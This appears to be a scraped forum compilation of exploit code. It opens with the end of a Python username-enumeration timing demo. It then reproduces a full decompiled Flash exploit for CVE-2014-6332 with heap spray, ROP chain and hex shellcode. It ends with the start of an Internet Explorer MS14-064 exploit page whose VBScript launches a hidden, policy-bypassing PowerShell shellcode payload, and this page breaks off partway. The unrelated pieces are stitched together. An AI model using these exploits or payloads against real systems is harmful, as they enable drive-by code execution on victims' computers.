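    baseline measured for a username that certainly does not exist."""
    baseline_name = "no-such-user-" + os.urandom(6).hex()
    baseline = max(median_login_time(login, baseline_name, trials), 1e-9)
    return {
        name for name in candidates
        if median_login_time(login, name, trials) / baseline >= ratio
    }


if __name__ == "__main__":
    wordlist = ["admin", "editor", "root", "test"]
    print("leaky  :", enumerate_users(login_leaky, wordlist))    # {'admin'}
    print("uniform:", enumerate_users(login_uniform, wordlist))  # set()
```

Against the uniform version the ratio sits near 1 for every name, so the oracle has nothing to work with; the cost of the fix is one extra hash computation per failed login for unknown users.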
-
[h=1]Exploit.SWF.CVE-2014-6332[/h]By: physicaldrive0 on Nov 21st, 2014 *** PhysicalDrive0 *** package mx.core { public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal"; }//package mx.core ?package mx.core { public interface IFlexAsset { } }//package mx.core ?package mx.core { import flash.utils.*; public class ByteArrayAsset extends ByteArray implements IFlexAsset { mx_internal static const VERSION:String = "4.6.0.23201"; } }//package mx.core ?package { import mx.core.*; public class flappyMan_keyClass extends ByteArrayAsset { } }//package ?package { import flash.events.*; import flash.utils.*; import flash.display.*; import flash.media.*; import __AS3__.vec.*; import flash.net.*; import flash.external.*; public class flappyMan extends MovieClip { public var keyClass:Class; private var btaObj:ByteArray; private var outObj:theoutobj; private var sndObj:Sound; public var vtObj20W:Vector.<Object>; public var vtObj1H:Vector.<Object>; public var vtObj20WLen:int = 1022; public var vtObj1HLen:int = 1007; private var workTimerExploit:Timer; private var bGoNextStep:Boolean = false; private var bExploited:Boolean = false; private var infectedObjIndex:int = 0; private var changedPropertyObjIndex:int = 0; private var iLoopCount:int = 0; private var controlledAddr:uint = 0; private var heapSprayObjAddr:uint = 0x1E140000; private var fakeEnvcoreObjAddr:uint; private var offset:int = 0; private var iCountOffset:int = 184; private var stackMemoryStructAddr:int = 0; private var flagNumber:uint = 3735928545; private var flagSavePosition:int = 176; private var ropChainLen:int = 0; private var uiNopValue:uint = 0; private var recObjAddr:uint = 0; private var _MaxCountPos:uint = 0; private var heapSprayLenByEnv20W:int = 98688; private var storedObjIndex:int = 0; public var fModuleAddrStart:int = 0; public var fModuleAddrEnd:int = 0; private var code:String = ""; private var stopCode:String = ""; private var jpgBytes:ByteArray; private var jpgLoader:URLLoader; 
private var floatString:String = ""; public function flappyMan(){ this.keyClass = flappyMan_keyClass; this.fakeEnvcoreObjAddr = (this.heapSprayObjAddr + 0x0100); this.stackMemoryStructAddr = (this.heapSprayObjAddr + 32); this.btaObj = new ByteArray(); this.outObj = new theoutobj(); this.sndObj = new Sound(); this.vtObj20W = new Vector.<Object>(this.heapSprayLenByEnv20W); this.vtObj1H = new Vector.<Object>(256); var _local1:Number = 500; var _local2:int = (17 * 2); this.workTimerExploit = new Timer((_local1 / 2), _local2); super(); var _local3:* = new URLRequest(); this.jpgBytes = new ByteArray(); this.jpgLoader = new URLLoader(); _local3.url = "shadow.jpg"; this.jpgLoader.dataFormat = URLLoaderDataFormat.BINARY; this.jpgLoader.addEventListener(Event.COMPLETE, this.func_prepare); this.jpgLoader.load(_local3); } private function evalCode(_arg1:uint):void{ if (ExternalInterface.available){ ExternalInterface.call("Beginx", ""); }; } private function checkEvnExploitable():Boolean{ return (true); } private function checksharobject():Boolean{ var _local2:Number; var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.close(); return (false); }; _local2 = (new Date().time - _local1.data.now); if (_local2 < ((((1 * 24) * 60) * 60) * 1000)){ _local1.close(); return (true); }; _local1.close(); return (false); } private function setsharobject():Boolean{ var _local1:SharedObject = SharedObject.getLocal("flashplayerinUSA"); if (_local1.size == 0){ _local1.data.now = new Date().time; _local1.flush(); _local1.close(); return (true); }; return (false); } public function func_prepare(_arg1:Event):void{ var _local2:int; var _local3:int; var _local4:int; if (((!(this.checkEvnExploitable())) || (this.checksharobject()))){ return; }; _local2 = 0; while (_local2 < this.heapSprayLenByEnv20W) { this.vtObj20W[_local2] = new Vector.<uint>(this.vtObj20WLen); this.vtObj20W[_local2][(this.vtObj20WLen - 2)] = 1; _local2++; }; _local2 = 0; while 
(_local2 < 0x0100) { this.vtObj1H[_local2] = new Vector.<Object>(this.vtObj1HLen); _local3 = 0; while (_local3 < this.vtObj1HLen) { this.vtObj1H[_local2][_local3] = this.sndObj; _local3++; }; _local2++; }; this.evalCode(0); this.workTimerExploit.start(); this.workTimerExploit.addEventListener(TimerEvent.TIMER, this.func_step2); } public function func_step2(_arg1:Event):void{ if (this.bExploited == true){ this.workTimerExploit.stop(); return; }; var _local2:int; while (_local2 < this.heapSprayLenByEnv20W) { try { if ((this.vtObj20W[_local2] as Vector.<uint>).length > this.vtObj20WLen){ this.bExploited = true; break; }; } catch(e:Error) { }; _local2++; }; if (!this.bExploited){ return; }; this.workTimerExploit.stop(); this.changedPropertyObjIndex = _local2; this.storedObjIndex = this.changedPropertyObjIndex; _local2 = 0; this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][((0x1000 / 4) - 2)]; if (this.uiNopValue != this.vtObj20WLen){ this._MaxCountPos = (((this.vtObj20W[this.storedObjIndex].length - (0x1000 / 4)) - 2) / (0x1000 / 4)); _local2 = 0; while (_local2 < this._MaxCountPos) { this.uiNopValue = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))]; if (this.uiNopValue == this.vtObj20WLen){ break; }; _local2++; }; if (_local2 == this._MaxCountPos){ this.bExploited = true; return; }; }; this.recObjAddr = this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 1) + ((0x1000 / 4) * _local2))]; this.vtObj20W[this.changedPropertyObjIndex][(((0x1000 / 4) - 2) + ((0x1000 / 4) * _local2))] = 1073741823; if (this.checkProperty() == false){ return; }; this.controlledAddr = ((this.heapSprayObjAddr + (0x1000 * (_local2 + 1))) + 8); var _local3:uint; var _local4:uint = (this.controlledAddr + ((this.heapSprayLenByEnv20W - this.changedPropertyObjIndex) * 0x1000)); _local2 = ((this.controlledAddr & 0xFFFFF000) + 0x1000); while (_local2 < _local4) { if (((((((((((((!((this.readUnsignedInt((_local2 + (4 * 4))) == 0))) && 
(!((this.readUnsignedInt((_local2 + (6 * 4))) == 0))))) && ((this.readUnsignedInt((_local2 + (7 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (8 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (12 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (13 * 4))) == 0)))) && ((this.readUnsignedInt((_local2 + (15 * 4))) == 2)))){ _local3 = _local2; break; }; _local2 = (_local2 + 0x1000); }; if (!_local3){ return (this.safe_exit()); }; var _local5:int = _local3; while (1) { if (_local5 < 65536){ return (this.safe_exit()); }; if (this.readUnsignedInt((_local5 + 16)) < 5){ break; }; _local5 = this.readUnsignedInt((16 + _local5)); }; var _local6:int; var _local7:int; while (_local6 < 100) { if ((((((this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))) > 0x10000000)) && ((this.readUnsignedInt(((_local5 + 76) + (_local6 * 40))) == 0)))) && ((this.readUnsignedInt(((_local5 + 84) + (_local6 * 40))) == 0)))){ _local7 = this.readUnsignedInt(((_local5 + 80) + (_local6 * 40))); if ((((((((this.readUnsignedInt((_local7 + 4)) == 1007)) && ((this.readUnsignedInt((_local7 + 16)) == this.readUnsignedInt((_local7 + 64)))))) && ((this.readUnsignedInt((_local7 + 28)) == this.readUnsignedInt((_local7 + 44)))))) && (this.readUnsignedInt((_local7 + 28))))){ break; }; }; _local6++; }; if (_local6 == 100){ return (this.safe_exit()); }; _local7 = this.readUnsignedInt((_local7 + 28)); _local7 = (_local7 & 0xFFFFFFFC); var _local8:uint = this.readUnsignedInt(_local7); _local8 = (_local8 & 0xFFFF0000); while (1) { if ((this.readUnsignedInt(_local8) % 65536) == 23117){ break; }; _local8 = (_local8 - 65536); }; var _local9:uint = _local8; _local8 = this.readUnsignedInt((_local9 + 60)); _local8 = this.readUnsignedInt(((_local9 + _local8) + 128)); _local8 = (_local9 + _local8); var _local10:int = _local8; var _local11:int; var _local12:int; _local6 = 0; while (_local6 < 20) { _local8 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 12))); if 
((this.readUnsignedInt(_local8) ^ 0x20202020) == 1852990827){ _local12 = (_local9 + this.readUnsignedInt((_local10 + (_local6 * 20)))); _local11 = (_local9 + this.readUnsignedInt(((_local10 + (_local6 * 20)) + 16))); break; }; _local6++; }; if (_local6 == 20){ return (this.safe_exit()); }; var _local13:uint; var _local14:uint; var _local15:uint; var _local16:uint; var _local17:int; _local6 = 0; while ((((_local6 < 1367)) && ((_local17 < 2)))) { _local8 = (_local9 + this.readUnsignedInt((_local12 + (_local6 * 4)))); if ((((_local8 == _local9)) || ((_local8 > (_local9 + 0xFFFFFF))))){ break; }; if (((!(_local13)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1953655126)) && ((this.readUnsignedInt((_local8 + 6)) == 1097621877)))) && ((this.readUnsignedInt((_local8 + 10)) == 1668246636)))))){ _local14 = (_local11 + (_local6 * 4)); _local13 = this.readUnsignedInt(_local14); _local17++; } else { if (((!(_local15)) && ((((((this.readUnsignedInt((_local8 + 2)) == 1349805383)) && ((this.readUnsignedInt((_local8 + 6)) == 1097035634)))) && ((this.readUnsignedInt((_local8 + 10)) == 1701995620)))))){ _local16 = (_local11 + (_local6 * 4)); _local15 = this.readUnsignedInt(_local16); _local17++; }; }; _local6++; }; if (_local6 == 1367){ return (this.safe_exit()); }; this.fModuleAddrStart = this.readUnsignedInt((_local9 + 60)); this.fModuleAddrEnd = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 264)); this.fModuleAddrStart = this.readUnsignedInt(((_local9 + this.fModuleAddrStart) + 260)); this.fModuleAddrStart = (_local9 + this.fModuleAddrStart); this.fModuleAddrEnd = (_local9 + this.fModuleAddrEnd); _local6 = this.fModuleAddrStart; this.writeUnsignedInt((this.stackMemoryStructAddr - 8), this.fModuleAddrStart); this.writeUnsignedInt((this.stackMemoryStructAddr - 4), this.fModuleAddrEnd); var _local18:int; _local6 = this.fModuleAddrStart; while (_local6 < this.fModuleAddrEnd) { if ((((((this.readUnsignedInt(_local6) == _local14)) && (((this.readUnsignedInt((_local6 - 
2)) & 0xFFFF) == 5631)))) && (((this.readUnsignedInt((_local6 + 4)) & 0xFF) == 195)))){ _local18 = (_local6 - 2); break; }; _local6++; }; var _local19:uint; var _local20:uint; var _local21:uint; var _local22:uint; var _local23:uint; var _local24:uint; var _local25:uint; var _local26:uint; _local6 = (this.fModuleAddrStart + 0x1000); _local17 = 0; while ((((_local6 < (this.fModuleAddrEnd - 4))) && ((_local17 < 4)))) { _local21 = this.readUnsignedInt(_local6); if (((!(_local26)) && (((_local21 & 0xFFFF) == 50068)))){ _local26 = _local6; _local17++; }; if (((!(_local25)) && (((_local21 & 0xFFFF) == 50070)))){ _local25 = _local6; _local17++; }; if (((!(_local23)) && (((_local21 & 0xFFFF) == 50008)))){ _local23 = _local6; _local17++; }; if (((!(_local24)) && (((_local21 & 0xFFFF) == 8447)))){ _local24 = _local6; _local17++; }; _local6++; }; if ((((((((((((((_local13 == 0)) || ((_local25 == 0)))) || ((_local24 == 0)))) || ((_local23 == 0)))) || ((_local18 == 0)))) || ((_local15 == 0)))) || ((_local26 == 0)))){ return (this.safe_exit()); }; var _local27:int = (_local25 + 1); var _local28:int = (this.heapSprayObjAddr + 65792); var _local29 = (_local28 & 0xFFFFF000); var _local30:ByteArray = new ByteArray(); _local30.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 0x0100) { var _temp1 = _local6; _local6 = (_local6 + 1); _local30.writeUnsignedInt(this.readUnsignedInt((_local29 + (4 * _temp1)))); }; var _local31:ByteArray = new ByteArray(); _local31.endian = Endian.LITTLE_ENDIAN; _local6 = 0; while (_local6 < 262144) { var _temp2 = _local6; _local6 = (_local6 + 1); _local31.writeUnsignedInt(this.readUnsignedInt((_local28 + (4 * _temp2)))); }; var _local32 = 96; var _local33 = 32; var _local34:int; var _local35:uint = ((_local28 + _local32) + _local33); var _temp3 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local29 + (4 * _temp3)), _local35); _local34 = 0; var _temp4 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * 
_temp4)), _local27); var _temp5 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp5)), _local25); var _temp6 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp6)), _local23); var _temp7 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp7)), _local28); var _temp8 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp8)), _local18); var _temp9 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp9)), _local29); var _temp10 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp10)), 65536); var _temp11 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp11)), 0x1000); var _temp12 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp12)), 64); var _temp13 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp13)), (_local18 + 6)); var _temp14 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp14)), (_local18 + 6)); var _temp15 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp15)), (_local18 + 6)); var _temp16 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp16)), _local24); var _temp17 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp17)), _local24); this.ropChainLen = (_local34 * 4); while (_local34 < (_local32 / 4)) { var _temp18 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp18)), (_local28 + _local32)); }; while (_local34 < ((_local32 + _local33) / 4)) { var _temp19 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp19)), _local26); }; this.ropChainLen = _local34; var _temp20 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp20)), 2425415307); var _temp21 = 
_local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp21)), 0x90909090); var _temp22 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp22)), 3096481936); var _temp23 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp23)), (this.heapSprayObjAddr + 8)); var _temp24 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp24)), 3146813584); var _temp25 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp25)), _local15); var _temp26 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp26)), 2425362569); var _temp27 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp27)), 3096481936); var _temp28 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp28)), (_local35 + (((_local34 - this.ropChainLen) + 1) * 4))); var _temp29 = _local34; _local34 = (_local34 + 1); this.writeUnsignedInt((_local28 + (4 * _temp29)), 2428752127); var _local36 = 
"81ec8b550003ccec57565300fc6085c70000ffff85c70000fffffc3800000000fd1885c70000ffff85c70000fffffc7000000000fc4485c70001ffff85c70000fffffce400000000fcd885c70000ffff85c70000fffffc3c00000000fd0c85c70000ffff45c70000000000fcf485c70000fffffcc7000000fffc4c85000000ff0085c70000fffffd33000000858966c0fffffc648966c933fffd108ddc85c7ff00fffffcc7000000fffd0485000000fff885c70000fffffcc7000000fffc5085000000ff0885c70000fffffdc7000000fffc5885000000ff5c85c70000fffffcc7000000fffc4885000000ff6885c70000fffffcc7000000fffd2485000000ff4085c70000fffffcc7000000fffc5485000000fffc85c70000fffffcc7000000fffc7485000000ff7885c70000fffffcc7000000fffc7c85000000ffe885c70045fffffcc754454dfffcec854c442efff085c74c00fffffcc7000000fffd1c85000000ff2085c70000fffffdc7000000fffce085000000ff6c85c70000fffffcc7000000fffc8085917432ff8485c70c85fffffcc7bbafdffffc8885de5967ff8c85c71e05fffffcc76144aafffc90853d8815ff9485c76c58fffffcc797410ffffc9885e2f2b2ff9c85c7f4a0fffffcc7cb9765fffca08564a41effa485c7efbbfffffcc72729f8fffca885ae9074ffac85c78093fffffcc794e432fffcb0851f8dc4ffb485c77457fffffcc7ff0d66fffcb885a22f51ffbc85c70139fffffcc7837de2fffcc08507d145ffc485c74863fffffcc74fd189fffcc88517053dffcc85c78ed7fffffcc7818f6efffcd08544d772ffd485c78072fffffce88644d700000000f0002558002dffff89000100fffc488589008bfffffc588530a164ff8b00000085890c40fffffd148b1c408bdc8b0840fc488d8bec83ffff2404c7206553744e042444c76e6f4374082444c7747865740c2444c765726854102444c70000646151ff50548de38b08fffc808d544189ff28bd8d5733fffffdccb966c9f3c0330285c75faafffffd2800010010fd28958d6a52ffffd495fffe89fffffcfffd088508bd83ff00fffffd41e905748b000003fffc9085508589ff8dfffffcfffc8085f88b60ffa164c933000000308b0c408b688b1c4020588b084b38008bb1f375180c4b383332b1ec75750e4b38382eb1e5de75104bf78bed8be859126a0000001fee8bf9e26e686c6a546c6474c48316ff6ae88b0804e85903e20000005145ebf93c758b56782e748b8b56f503f50320764149c93333c503ad10be0fdb0874d63a0307cbc1f1eb40dae7751f3b245e8b5e8b66dd035e8b4b0c8bdd031cc5038b04c3595eab508d8b613bfffffcfffc908de90575ff00000278000000e885895800fffffc5
c086a0c6afca895ffff50fffffffcc8957c8589ff83fffffcfffc7cbd057500ff000247e96a586a00a895ff0850fffffcfcc895ff958bfffffffffc7c8b084289fffc7c85087883ffe90575000000021c8d8d586afffffc807c958b518bfffffcff500842fffccc950cc483fffc588d8b3981ffffdeadbeef958b7f75fffffc5841047a81754141417c858b708bfffffcfffc588d08518bff8b045089fffc58850cc083fffc788589046affff001000687c8d8b008bfffffc6a5204518895ff008bfffffcfffc7c8d8b0189fffffc7c95003a83ff858b2374fffffc7c5104488bfc78958b8b52fffffffc7c8551088bfffccc95ffc483ffff7c958b0c83fffffc0575003a000163e968046a000000100000010468ff006a00fffc8895208589ff83fffffdfffd20bd057500ff00013be920858b0050fffffd00010468bc95ff0089fffffcfffc6c856cbd83ff00fffffc15e905758b000001fffd208d6c8d03ffc7fffffc6e69770120958b6403fffffdfffc6c950442c7ff2e706d75fd20858b8503fffffffffc6c650840c76a00657800806800026a0000036a006a8d8b026afffffd20ac95ff5189fffffcfffce085e0bd83fffffffffcade905756a0000006c958d0052fffffcfc7c858b488bffff958b5104fffffc7c8b50028bfffce08d95ff51fffffffcb0fce0958bff52fffffffcb495e8858dff50fffffcfc9895ff8589fffffffffd1cfd1cbd837400ffff8b056a11fffd208d95ff51fffffffcb8958b4aebfffffcf8c095ff5260fffffc140000b8eb20891edb33592b89338b64c033044efd209d8b5350ffff808d8d508bfffffce1ff3849140000b88b008b1e07eb61e0ffffd0e890edebffc35de58b424242427042424277a0908055000000ec81ec8b000002d85608558bf445c75754454d452ef845c7c74c4c440000fc45d28500008d573f74fffd28bd66c933ff3302ccb95faaf3c08d08728bfffd288585c750fffffffd28000100106a544e8b85d1fffe8b0e75c0558d1846d0ff52f40175c0855de58bccc340c033cccccccccccccccc0000cccc"; var _local37:uint = this.writeString((_local28 + (4 * _local34)), _local36); this.writeUnsignedInt(this.heapSprayObjAddr, _local37); var _local38:ByteArray = (new this.keyClass() as ByteArray); var _local39:ByteArray = new ByteArray(); _local38.readBytes(_local39, 0, 0x0100); _local38.endian = Endian.LITTLE_ENDIAN; _local38.position = 0x0100; this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; ByteArray(this.jpgLoader.data).position = 
_local38.readInt(); ByteArray(this.jpgLoader.data).readBytes(this.jpgBytes, 0, 0); this.jpgBytes = this.encryption(this.jpgBytes, _local39); this.jpgBytes.endian = Endian.LITTLE_ENDIAN; this.jpgBytes.position = 0; var _local40:* = this.jpgBytes.length; var _local41:int; var _local42:uint; while (((_local41 + 1) * 4) < _local40) { _local42 = this.jpgBytes.readInt(); try { this.writeUnsignedInt((_local37 + (_local41 * 4)), _local42); } catch(e:Error) { }; _local41++; }; var _local43:uint = this.readUnsignedInt(_local7); this.writeUnsignedInt(_local7, _local28); this.sndObj.toString(); this.writeUnsignedInt(_local7, _local43); _local31.position = 0; _local6 = 0; while (_local6 < (_local31.length / 4)) { var _temp30 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local28 + (4 * _temp30)), _local31.readUnsignedInt()); }; _local30.position = 0; _local6 = 0; while (_local6 < (_local30.length / 4)) { var _temp31 = _local6; _local6 = (_local6 + 1); this.writeUnsignedInt((_local29 + (4 * _temp31)), _local30.readUnsignedInt()); }; this.setsharobject(); return (this.safe_exit()); } public function safe_exit():void{ this.writeUnsignedInt(this.heapSprayObjAddr, this.vtObj20WLen); this.writeUnsignedInt((this.heapSprayObjAddr + 4), this.recObjAddr); this.writeUnsignedInt((this.controlledAddr - 8), this.vtObj20WLen); } public function logMsg(_arg1:String):void{ if (ExternalInterface.available){ }; } public function get_address(_arg1:String):uint{ var _local2:uint; if (ExternalInterface.available){ _local2 = ExternalInterface.call(_arg1, ""); }; return (_local2); } public function exception_exit():void{ if ((this.vtObj20W[this.changedPropertyObjIndex] as Vector.<uint>).length >= 1073741823){ this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - 2)] = this.vtObj20WLen; }; } private function read4bytes(_arg1:uint):uint{ var _local2:uint; if (_arg1 > this.controlledAddr){ _local2 = this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)]; } else 
{ _local2 = this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))]; }; return (_local2); } private function readUnsignedInt(_arg1:uint):uint{ var _local2:uint; var _local3:uint; var _local4:uint; if ((_arg1 % 4) == 0){ _local4 = this.read4bytes(_arg1); } else { if ((_arg1 % 4) == 1){ _local3 = (((this.read4bytes((_arg1 - 1)) & 0xFFFFFF00) / 0x0100) & 0xFFFFFF); _local2 = (((this.read4bytes((_arg1 + 3)) & 0xFF) * 16777216) & 0xFF000000); _local4 = (_local2 + _local3); } else { if ((_arg1 % 4) == 2){ _local3 = (((this.read4bytes((_arg1 - 2)) & 0xFFFF0000) / 65536) & 0xFFFF); _local2 = (((this.read4bytes((_arg1 + 2)) & 0xFFFF) * 65536) & 0xFFFF0000); _local4 = (_local2 + _local3); } else { _local3 = (((this.read4bytes((_arg1 - 3)) & 0xFF000000) / 16777216) & 0xFF); _local2 = (((this.read4bytes((_arg1 + 1)) & 0xFFFFFF) * 0x0100) & 0xFFFFFF00); _local4 = (_local2 + _local3); }; }; }; return (_local4); } private function writeUnsignedInt(_arg1:uint, _arg2:uint):void{ if (_arg1 > this.controlledAddr){ this.vtObj20W[this.changedPropertyObjIndex][((_arg1 - this.controlledAddr) / 4)] = _arg2; } else { this.vtObj20W[this.changedPropertyObjIndex][(0x40000000 - ((this.controlledAddr - _arg1) / 4))] = _arg2; }; } public function encryption(_arg1:ByteArray, _arg2:ByteArray):ByteArray{ var _local3:ByteArray = new ByteArray(); var _local4:uint = _arg1.length; _local3 = this.rc4_crypt(_arg2, _arg1, _local4); return (_local3); } public function rc4_crypt(_arg1:ByteArray, _arg2:ByteArray, _arg3:uint):ByteArray{ var _local4:int; var _local5:int; var _local6:int; var _local7:uint; var _local8:uint; var _local9:ByteArray = new ByteArray(); while (_local7 < _arg3) { _local4 = ((_local4 + 1) % 0x0100); _local5 = ((_local5 + _arg1[_local4]) % 0x0100); _local8 = _arg1[_local4]; _arg1[_local4] = _arg1[_local5]; _arg1[_local5] = _local8; _local6 = ((_arg1[_local4] + _arg1[_local5]) % 0x0100); _local9[_local7] = (_arg2[_local7] ^ _arg1[_local6]); 
_local7++; }; return (_local9); } private function HexString2ByteArray(_arg1:String):ByteArray{ var _local2:String; var _local3:uint = _arg1.length; var _local4:uint; var _local5:ByteArray = new ByteArray(); _local5.endian = Endian.LITTLE_ENDIAN; while (_local4 < _local3) { _local2 = (_arg1.charAt(_local4) + _arg1.charAt((_local4 + 1))); _local5.writeByte(parseInt(_local2, 16)); _local4 = (_local4 + 2); }; return (_local5); } private function writeString(_arg1:int, _arg2:String):int{ var _local3:int; var _local4:int; var _local5:int; var _local6:ByteArray = this.HexString2ByteArray(_arg2); while (_local3 < (_arg2.length / 2)) { _local5 = ((((_local6[_local3] * 16777216) + (_local6[(_local3 + 1)] * 65536)) + (_local6[(_local3 + 2)] * 0x0100)) + _local6[(_local3 + 3)]); _local3 = (_local3 + 4); this.writeUnsignedInt((_arg1 + (_local4 * 4)), _local5); _local4++; }; return ((_arg1 + (_local4 * 4))); } private function checkProperty():Boolean{ var _local1:int; while (_local1 < this.heapSprayLenByEnv20W) { if (this.vtObj20W[_local1].length == 1073741823){ break; }; _local1++; }; if (_local1 == this.heapSprayLenByEnv20W){ return (false); }; this.changedPropertyObjIndex = _local1; return (true); } } }//package class theoutobj { public function theoutobj(){ } public function therundata(_arg1:uint, _arg2:uint, _arg3:uint):uint{ var _local4:uint; return (_local4); } } Sursa: Exploit.SWF.CVE-2014-6332 - Pastebin.com
-
[h=1]Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064)[/h]

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11            |
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/     |
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec)         |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual   |
| Usage: http://www.fuzzysecurity.com/exploits/21.html                     |
|--------------------------------------------------------------------------|

Very nice black-magic yuange, don't think it went unnoticed that you have
been popping shells since 2009 ???????????
|--------------------------------------------------------------------------|
</pre>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
shell.ShellExecute "powershell", params, "", "", 0
end function
</script>

<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function
end if
if (instr(info,"MSIE")>0) then
